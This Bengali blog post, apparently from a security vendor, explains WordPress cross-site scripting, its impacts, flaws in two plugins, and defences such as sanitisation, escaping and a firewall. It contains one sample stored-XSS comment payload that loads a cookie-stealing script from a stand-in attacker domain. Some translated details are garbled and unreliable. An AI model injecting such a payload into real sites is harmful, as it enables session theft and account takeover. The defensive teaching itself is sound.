Web Application-গুলিতে পাওয়া একটি Security দুর্বলতা Cross-Site Scripting, যা সংক্ষেপে XSS নামেও পরিচিত। WordPress XSS Attack-কারীদের ছদ্মবেশে Malicious content inject করার অনুমতি দেয়। WordPress XSS দুর্বলতা, ব্যবহারকারী-Website Interaction-কেও compromised করে। এটি আক্রমণকারীদের Valid User হিসাবে Malicious content upload করতে, ব্যবহারকারীর certificate এবং তথ্য চুরি করতে, আপনার website-কে বিকৃত করতে এবং আপনার Brand-কে কলঙ্কিত করতে দেয়।
WordPress XSS Exploitation সম্প্রতি খবর এসেছে যে, যখন Software বিশ্লেষণে বিশেষজ্ঞ একটি কোম্পানি WordPress এবং নীচে পাওয়া Cross-Site Scripting দুর্বলতার বিবরণ প্রকাশ করেছে।
WordPress XSS দুর্বলতা হল সবচেয়ে বেশি দেখা দুর্বলতাগুলির মধ্যে একটি, তবুও এগুলিকে সবচেয়ে বেশি উপেক্ষা করা হয়। XSS হল একটি Cyber ত্রুটি যা ব্যবহারকারীদের (অথবা ব্যবহারকারী হিসাবে জাহির করা হ্যাকারদের) নির্বিচারে Input permission দিয়ে একটি page-এ ক্ষতিকর code inject করতে দেয়।
XSS Exploitation সঞ্চিত এবং প্রতিফলিতদের মধ্যে শ্রেণীবদ্ধ করা হয়ঃ
- সংরক্ষিত Cross-Site Scripting মানে Hacker একটি দুর্বল page-এ একটি ক্ষতিকর Script Injection করেছে, যেটি প্রতিবারই চালানো হয় যখন কোনও সন্দেহ জনক শিকার সংক্রামিত page-এ যায়।
- প্রতিফলিতCross-Site Scripting যখন একজন আক্রমণকারী একটি একক HTTP request-এর মধ্যে ক্ষতিকর Code Inject করে এবং Injection করা payload-টি অন্তর্ভুক্ত করা হয় যাতে এটি কার্যকর করা রোধ করার জন্য কোনও নিরাপত্তা ব্যবস্থা নেওয়া হয় না। Injection করা payload web application-এ কোথাও সংরক্ষণ করা হয় না, এটি প্রতিফলিত XSS কে আলাদা করে তোলে।
কিভাবে XSS আক্রমণ করা হয় তা এখানে :
- Hacker আপনার Website-এ একটি account তৈরি করে।
- Hacker পর্যবেক্ষণ করে যে আপনার Website-এ একটি সংরক্ষিত XSS দুর্বলতা রয়েছে। যদি কেউ এতে HTML tag সহ একটি মন্তব্য post করে, তাহলে tag-গুলি যেমন আছে তেমনই প্রদর্শিত হবে এবং যেকোনো Script tag চলতে শুরু করবে।
- একটি Article-এর comment section-এ Hacker একটি Script tag সহ Insert text করে। যেমন:
I am in love with your website <script src="https://mallorysevilsite.com/authstealer.js">
- যখন একজন ব্যবহারকারী (U) comment-সহ page-টি load করে, তখন Script tag-টি চলে এবং U-এর অনুমোদন cookie চুরি করে।
- চুরি হওয়া cookie Hacker-এর গোপন server-এ পাঠানো হয় যা তাকে সন্দেহজনক ব্যবহারকারী U এর ছদ্মবেশ ধারণ করতে সক্ষম করে।
300+ পরীক্ষার ফলসহ চূড়ান্ত WordPress security checklist পান
XSS Exploitation আপনাকে আপনার ওইয়েবসাইট থেকে লগ আউট করতে পারে। এটি আপনার ছদ্মবেশ ধারণ করতে এবং আপনার ব্র্যান্ড-এর চিত্রকে কলঙ্কিত করতেও ব্যবহার করা যেতে পারে। XSS দুর্বলতাকে কাজে লাগিয়ে হ্যাকাররা কী করতে সক্ষম তার একটি তালিকা রয়েছে ৷ এখানে সেগুলির কিছু আছেঃ
চুরি করা Cookies
cookie চুরি XSS দুর্বলতার একটি সাধারণ Exploitation । Cookies হল ছোট ফাইল, যা ব্যবহারকারী এবং ওয়েবসাইট-এর জন্য নির্দিষ্ট ডাটা রাখে। হ্যাকাররা চুরি করা cookie ব্যবহার করে ভ্যালিড ব্যবহারকারী হিসেবে ছদ্মবেশ ধারণ করতে পারে এবং ক্ষতিকর কাজের জন্যে এক্সেস ব্যবহার করতে পারে।
Compromised password
Password manager ব্যবহারকারীদের জন্য বিভিন্ন ওয়েবসাইট-এর একাউন্ট পরিচালনা করা সুবিধাজনক করে তোলে। Password manager ব্যবহারকারীদের জন্য Auto-fill password। হ্যাকাররা একটি password input তৈরি করতে দুর্বলতা ব্যবহার করতে পারে। যখন Password manager স্বয়ংক্রিয়ভাবে Password-টি পূরণ করে তখন Hacker Password-টি পড়ে এবং এটি তার নিজের Domain–এ পাঠায়। এখন, হ্যাকাররা একটি valid ব্যবহারকারী হিসাবে জাহির করতে পারে এবং আপনার ওয়েবসাইট-এর এক্সেস পেতে পারে।
Port scan
যারা দুর্বল Website পরিদর্শন করে তাদের স্থানীয় network-এ Port scan চালানোর জন্যও XSS ব্যবহার করা যেতে পারে। যদি নেটওয়ার্ক-এ এক্সেস পাওয়া যায় তাহলে আক্রমণকারী নেটওয়ার্ক-এর অন্যান্য device hack করতে পারে। এই ধরনের আক্রমণ চালানোর জন্য আক্রমণকারীরা Code Inject করে যা অভ্যন্তরীণ নেটওয়ার্ক স্ক্যান করে এবং আক্রমণকারীকে রিপোর্ট করে।
Cross site request জালিয়াতি
Cross site request Forgery(CSRF) আক্রমণকারীদের শেষ ব্যবহারকারীদের অবাঞ্ছিত কাজ সম্পাদন করতে বাধ্য করার ক্ষমতা প্রদান করে। Website-এর উপর নির্ভর করে আক্রমণকারী একটি সংযোগের request করতে পারে, একটি ম্যাসেজ পাঠাতে পারে, login certificate পরিবর্তন করতে পারে, Cryptocurrency স্থানান্তর করতে পারে বা source code সংগ্রহস্থলে একটি ব্যাকডোর করতে পারে।
Kilgar
JavaScript keyboard Capturing করতে এটি ব্যবহার করা যেতে পারে। JavaScript coder-দের একটি দুর্বল পেইজ-এ ব্যবহারকারীর দ্বারা সম্পাদিত keystroke-গুলি Log করার ক্ষমতা প্রদান করে। এসবকিছু বাণিজ্যিক website কিছু কোড উপলব্ধ করে যা click, Mobile gestures বা input আকারে দর্শকের গতিবিধি লগ করতে ব্যবহার করা যেতে পারে। এগুলি ক্ষতিকর প্রাণীদের হাতে বিপর্যয়কর হতে পারে।
আমাদের Intelligent firewall এবং malware scanner দেখুন।
XSS হল সবচেয়ে সাধারণ দুর্বলতা যা প্রতি বছর হাজার হাজার Website-এ ক্ষতিকারক Actor-দের Backdoor entry প্রদান করে। এগুলি WordPress XSS Exploitation-এর কয়েকটি সাম্প্রতিক উদাহরণ।
Exploit the Slimstat plugin
Slimstat একটি জনপ্রিয় Web Analytics Plug-in যা সম্প্রতি সঞ্চিত XSS দুর্বলতা পাওয়া গেছে। Slimstat real time-এ Website Analytics track করার জন্য ব্যবহার করা হয়। এটি access log, Returning গ্রাহক এবং নিবন্ধিত ব্যবহারকারী, JavaScript events ইত্যাদির পরিসংখ্যান নিরীক্ষণ এবং রিপোর্ট করে। দুর্বলতাকে কাজে লাগিয়ে হ্যাকার যে পরিমাণ Website data access করতে পারে তা কল্পনা করুন।
দুর্বলতা 4.8 এবং নীচের সংস্করণে উপস্থিত ছিল। এটি Plugin access log কার্যকারিতাতে নির্বিচারে JavaScript code injection করার অনুমতি দেয় না। যে Website-গুলি WordPress-এর সর্বশেষ সংস্করণ ব্যবহার করছিল এবং Astra WAF এর সুরক্ষায় ছিল, সেগুলি আক্রমণকারীদের থেকে নিরাপদ ছিল ৷
Facebook Messenger Live Chat
WordPress-এর মাধ্যমে, AJAX Functionality page পুনরায় load করার প্রয়োজন ছাড়াই Script থেকে data প্রেরণ এবং গ্রহণ করা সহজ করে তোলে। Work update_zb_fbc_code
যে কেউ access-যোগ্য।
Work wp_ajax_update_zb_fbc_code
শুধুমাত্র অনুমোদিত ব্যবহারকারীদের জন্য নির্ধারিত এবং wp_ajax_nopriv_update_zb_fbc_code
অসুবিধাপ্রাপ্ত ব্যবহারকারীদের জন্য। উভয়ই একই function ব্যবহার করে “update_zb_fbc_code
“. এটি যেকোনো ব্যবহারকারীকে Plugin settings পরিবর্তন করতে দেয়। ক্ষতিকর actor-রা গোপনীয় তথ্যে অগ্রাধিকার এক্সেস এই দুর্বলতা ব্যবহার করতে পারে।
WordPress file update করুন
WP v5.11 এবং নীচের সাথে সম্পর্কিত সমস্যাগুলি সমাধান করার দ্রুততম এবং সহজ উপায় হল WordPress-কে সর্বশেষ সংস্করণে আপডেট করা।
Input যাচাই করুন
সার্ভার-এ পাঠানোর আগে সমস্ত input data পরীক্ষা করুন এবং যাচাই করুন। শুধুমাত্র valid, বিশ্বস্ত ব্যবহারকারীদের কাছ থেকে input গ্রহণ করুন। উদাহরণস্বরূপ: ব্যবহারকারীর দ্বারা ইনপুট করা email-id যাচাই করতে নিম্নলিখিত ফাংশন-টি অনুসরণ করুন।
Filter_var PHP Function
Filter_var($_GET[‘email’], FILTER_VALIDATE_EMAIL)
is_email
Data Sanitize করুন
HTML markup-এর অনুমতি দেয় এমন সাইট-গুলিতে ব্যবহারকারীর দ্বারা data input Sanitize করার সুপারিশ করা হয়। সম্ভাব্য ক্ষতিকারক markup-এর ডাটা পরিষ্কার করে আপনি নিশ্চিত করতে পারেন যে data আপনার ব্যবহারকারী বা আপনার database-এর কোনো ক্ষতি করে না। WordPress-এর অবিশ্বস্ত Data entry filter করার জন্য দুর্দান্ত বৈশিষ্ট্য রয়েছে। এখানে WP command-গুলির একটি তালিকা রয়েছে যা আপনি আপনার Data Sanitize করতে ব্যবহার করতে পারেন।
sanitize_email
sanitize_file_name
sanitize_text_field
esc_url_raw
sanitize_option
sanitize_key
sanitize_mime_type
wp_kses
Sanitize_meta
Escape data
Data Escaping মানে প্রবেশ করা Data sensors করে Data security নিশ্চিত করা। এটি নিশ্চিত করে যে ডাটা-র মূল অক্ষরগুলি খারাপ উপায়ে ভুল ব্যাখ্যা করা হয় না। WordPress যে পাঁচটি মৌলিক Escaping function প্রদান করে তা হল:
esc_html
esc_url
esc_js
esc_attr
esc_textarea
Output-এ Data Encode করুন
সমস্ত HTTP প্রতিক্রিয়া Encode করুন যা ব্যবহারকারীর দ্বারা প্রবেশ করা data Output করে। Encodeing শুধুমাত্র প্রতিটি অক্ষরকে তার HTML নামে রূপান্তর করছে। আপনি ব্যবহার করতে পারেন Content type এবং X-Content-Type-Browsers. এটি বিকল্প শিরোনামে উদ্দেশ্যমূলক পদ্ধতিতে প্রতিক্রিয়াগুলি ব্যাখ্যা করে ।
একটি Web application firewall ব্যবহার করুন
আপনার Website-এ একটি নিরাপত্তা প্রহরী থাকা সবসময় সাহায্য করে। WAF বা Web application firewall সম্ভাব্য দুর্বলতার বিরুদ্ধে নিরাপত্তা প্রদান করে। Astra WAF ক্ষতিকর Traffic filter করে এবং আপনার Website-এ সুরক্ষা প্রদান করে। এটি XSS, SQLi, CSRF, bad bot, OWASP শীর্ষ 10 এবং 100+ অন্যান্য Cyber আক্রমণকে block করে। আমাদের Intelligent firewall আপনার Website Visitor pattern সনাক্ত করে এবং স্বয়ংক্রিয়ভাবে ক্ষতিকর Hacker-দের block করে।
গড়ে, একটি Website-কে প্রতিদিন 44 বার Malware দ্বারা আক্রমণ করা হয়।